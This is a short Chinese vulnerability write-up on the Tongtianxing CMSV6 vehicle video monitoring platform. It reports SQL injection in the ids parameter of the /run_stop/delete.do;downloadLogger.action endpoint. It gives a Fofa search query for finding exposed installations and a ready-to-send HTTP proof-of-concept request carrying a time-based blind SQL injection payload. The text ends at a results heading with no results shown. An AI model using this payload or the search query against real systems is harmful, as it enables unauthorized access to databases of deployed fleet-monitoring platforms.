漏洞描述:
通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。
通天星CMSV6车载视频监控平台/run_stop/delete.do;downloadLogger.action文件ids参数存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库信息。
搜索语法:
Fofa-Query: web.body="/808gps/"
漏洞详情:
1.通天星CMSV6车载视频监控平台。
2.漏洞POC:
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 03.漏洞复现结果。
